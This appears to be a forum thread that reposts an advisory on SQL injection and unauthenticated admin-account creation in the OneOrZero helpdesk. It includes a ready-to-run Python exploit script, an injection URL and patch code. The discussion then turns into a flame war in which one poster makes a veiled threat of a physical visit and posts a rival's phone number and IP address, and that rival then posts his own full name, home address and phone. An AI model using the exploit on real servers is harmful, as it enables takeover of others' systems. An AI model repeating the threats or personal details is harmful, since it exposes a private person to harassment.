SQL Injection

[CourtneyDS]

Problems :
- SQL Injection
- Admin Access

PHP Code/Location :


supporter/tupdate.php :


if($groupid == 'change'){
$sql = "UPDATE $mysql_tickets_table set groupid=$sg where id=$id";
$result = $db->query($sql);
}


admin/install.php :


[...]
if($step == 2){

echo "

";
start("Helpdesk Installation", "center");
if($HTTP_POST_VARS['first'] == ''){
showError("first name");
$flag = 1;
}
if($HTTP_POST_VARS['last'] == ''){
showError("last name");
$flag = 1;
}
if($HTTP_POST_VARS['user'] == ''){
showError("user name");
$flag = 1;
}
if($HTTP_POST_VARS['email'] == ''){
showError("email address");
$flag = 1;
}
if($HTTP_POST_VARS['pwd1'] == '' || $HTTP_POST_VARS['pwd2'] == ''){
showError("password");
$flag = 1;
}
if($HTTP_POST_VARS['office'] == ''){
showError("office");
$flag = 1;
}

if (!checkPwd($HTTP_POST_VARS['pwd1'], $HTTP_POST_VARS['pwd2'])){
showError("password");
$flag = 1;
}

if(!validEmail($HTTP_POST_VARS['email'])){
showError("email");
$flag = 1;
}


if($flag == 1){
endit();
exit;
}
[...]
$pwd = md5($HTTP_POST_VARS['pwd1']);
$query = "INSERT IGNORE into $mysql_users_table VALUES(NULL,
'".$HTTP_POST_VARS['first']."', '".$HTTP_POST_VARS['last']."',
'".$HTTP_POST_VARS['user']."', '".$HTTP_POST_VARS['email']."', '',
'".$pwd."', '".$HTTP_POST_VARS['office']."', '".$HTTP_POST_VARS['phone']."',
1, 1, 1, 'default', null, null, null, 0, 'English', '0')";
$db->query($query);
[...]


Exploits :


]/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10http://[target]/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10
will change the description of the ticket number 10 into "abcd"
(char(97,98,99,100))

To exploit the second one.. in python 2.2 :


import urlparse
import httplib
import string

OneOrZero("http://www.target.com","80","NewUserName","NewPassword")


class OneOrZero:
def __init__(self,target,port,user,password):
if port != "":
self.port=str(port)
else :
self.port="80"
self.path=str(urlparse.urlparse(target)[2])
self.target=str(urlparse.urlparse(target)[1])
self.user=str(user)
self.password=str(password)
self.USER_AGENT='OneOrZero.py'
self.CreateAdminAccount()

def CreateAdminAccount(self):


data='step=2&first=admin&last=admin&user='+self.user+'&pwd1='+self.password+'&pwd2='+self.password+'&email=a@a.a&office=abcd'

try :
print "Connecting On "+self.target+"...\n"

http=httplib.HTTP(self.target,self.port)

print "Sending Data On "+self.target+"...\n"

http.putrequest("POST",self.path+"/admin/install.php")

http.putheader("Content-Type","application/x-www-form-urlencoded")
http.putheader("User-Agent",self.USER_AGENT)
http.putheader("Host",self.target)
http.putheader("Content-Length",str(len(data)))
http.endheaders()

http.send(data)

code,msg,headers = http.getreply()

print "HTTP Code : ",str(code)
print "HTTP Connection : ",msg
print "HTTP headers : \n",headers,"\n"

file=http.getfile()
if string.find(file.read(),"Administrator Account Created
Successfully.") != -1:
print "Congratulations, Administrator Account Created
Successfully."
print "You Can Log In Here :
http://"+self.target+self.path+"/admin/control.php"
print "User : ",self.user
print "Password : ",self.password
else :
print "Administrator Account Hasn't Been Created."

except :
print "Error During Admin Account Creation."


You just have to change the line :
OneOrZero("http://www.target.com","80","NewUserName","NewPassword")


Solution :

A patch (and more details in French) can be found on
.http://www.phpsecure.info.

- In supporter/tupdate.php, add the lines (at the begin) :



foreach ($_REQUEST as $key=>$value) {

if (get_magic_quotes_gpc()==0) {
$value = addslashes($value); // This will reproduce the option
magic_quotes_gpc=1
}

$value = str_replace('(','()',$value);

${$key} = $value;
$_REQUEST[$key] = $value;
if (isset($_POST[$key])) { $_POST[$key] = $value; }
if (isset($_COOKIE[$key])) { $_COOKIE[$key] = $value; }
if (isset($_FILE[$key])) { $_FILE[$key] = $value; }
if (isset($_GET[$key])) { $_GET[$key] = $value; }
if (isset($HTTP_POST_VARS[$key])) { $HTTP_POST_VARS[$key] = $value; }
if (isset($HTTP_COOKIE_VARS[$key])) { $HTTP_COOKIE_VARS[$key] = $value;
}
if (isset($HTTP_FILE_VARS[$key])) { $HTTP_FILE_VARS[$key] = $value; }
if (isset($HTTP_GET_VARS[$key])) { $HTTP_GET_VARS[$key] = $value; }
}



- In admin/install.php.. put the lines :

$sql = "SELECT * FROM $mysql_users_table WHERE id > 0";
$result = $db->query($sql);
$num_rows = $db->num_rows($result);
if ($num_rows > 0){
die("OneOrZero Is Already Installed.");
}


just after :

if($step == 2){


Credit to eLtorO


Sincerely
CourtneyDS

 

[eyelfixit]

I challenge this theory of attack.

All you have to do is delete the install file


If that's done this exploit is null.

 

[CourtneyDS]

Excellent and very well thought out rebuttal Rejean / Eyelfixit.. lol ...

Would you care to be more technically indepth of the ramifications deleting the "Index" would pose on the SQL ? ... How would deleting the Index stop a SQL Injection ? ...

^^ I already know what will happen.. but since you like to challange.. I want to hear it from you ...

I wait for your technical response with a big smile

Sincerely
CourtneyDS

 

[eyelfixit]

I never said delete the index file, I said delete the install file right after your done installing and your O.K.

Oh and here si a little info that coutneyBS doesn't want you to know:



SQL Injection is simply a term describing the act of passing SQL code into an application that was not intended by the developer. Since this topic is not specifically restricted to SQL Server it is not included in the normal FAQ. In fact, much of the problems that allow SQL injection are not the fault of the database server per-se but rather are due to poor input validation and coding at other code layers.

normal user (no fixed server or database roles)
Ability to natively access all objects in the database to which this account has been given access. At best, this may mean only being able to run some stored procedures. At worst, this means possible read/write access to all tables and views.

How can I prevent SQL Injection in my applications?

Here are some tips for avoiding SQL injection issues:

If a user is asked to input a number, verify the data type using ISNUMERIC or equivalent functions
For string data, replace single quotes with two single quotes using the replace function or equivalent
goodString = replace(inputString,','')

Use stored procedures to abstract data access so that users do not directly access tables or views
When using stored procedures, implement them using the ADO command object so that variables are strongly typed
Establish strong coding standards involving code review and peer-test often
How do I test if an existing application is subject to SQL Injection?

A method I recommend is that you briefly (on a test platform) disable error handling so that ODBC errors or SQL Server errors are displayed. Then, you can simply try inputting single quotes into your application to see if you can cause it to fail. A failure is usually indicative of poor validation and corruption of the SQL string. These are good hot-spots for the application.

As always, good code review is the best method. Take the time to do it or hire someone to do it. Better to pay now than later when the costs are not known

How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie

For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.

Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

Delete stored procedures that you are not using like:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

courtneyBS is just that, full of Bull_****

 

[CourtneyDS]

I would strongly advise reading Davids forum rules prior to posting Rejean Houl / Eyelfixit ...

In all actuallity.. a close friend of mine lives right in Burnaby British Columbia.. maybe he should pay you a visit and teach you some mannors ... Can he call you first ? <<>> 604-777-0488.. or just drop on by ?

David.. a strong warning is needed for the child from Balmoral Street ... I guess name calling with alot of cut and pasted data makes him feel important ...

Thanks in advance David

Sincerely
CourtneyDS

Ps : His IP = 24.69.255.205 ... It's out of Calgary Alberta Canada

Court

 

[eyelfixit]

Ouch, I guess the truth hurts eh?

Oh and I never called you ANY names, All I said is that I think your full of it, And you are

Oh and just in case you want to send this close friend here is my full information (cause your so wack you couldn't scare a fly):


Rejean Houle A.K.A. Eyelfixit

307-7050 Balmoral St.
Burnaby, B.C. Canada
V5E 3K4

Tel: (604) 777 0488

Tel you little friend to come and see me, no need to call.

Now back to forum business, your so weak and meager that you've been reduced to simple and idle threats. In my oppinion your making yourself look quite pathetic.

Oh and just so your simple mind can understand this. This is not "name calling" these are just my oppinions.

 

[webcamguy]

courts

I guess name calling with alot of cut and pasted data makes him feel important ...

rejean houl eh, yo rejean, ur the one showin ur ignorance dude cuz you dont know sheeot bro!

 

[eyelfixit]

It's funny how you only come out and post when courtneyBS is in trouble.

Nor do I want to beef with you. I have no problems with you and I do not whish to start anything else. This is between me and courtneyBS so please.

 

[eyelfixit]

.

 

[webcamguy]

It's funny how you only come out and post when courtneyBS is in trouble.

Nor do I want to beef with you. I have no problems with you and I do not whish to start anything else. This is between me and courtneyBS so please.

dude man, i dont look at this board all the time cuz there aint nothing happening just cruised by today and read your junk.
i dont want no probs with you dude, courts is puttin up code n ur copying sheeot from another site. dude man, you dont even know her code can be changed around for any sql. thats what im sayin bro, you dont know whats up n ur showin peeps that you dont know nothin! peeps are gonna read what you posted and laugh at ur arse! jus shut up n peeps wont really know how dumb you are!